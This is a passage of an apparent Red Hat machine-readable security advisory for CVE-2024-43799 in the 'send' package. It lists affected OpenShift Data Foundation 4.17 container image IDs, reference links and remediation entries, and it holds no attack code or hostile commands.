"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43799"
},
{
"category": "external",
"summary": "RHBZ#2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43799",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43799"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35",
"url": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg",
"url": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg"
}
],
"release_date": "2024-09-10T15:15:17.727000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-30T14:25:22+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
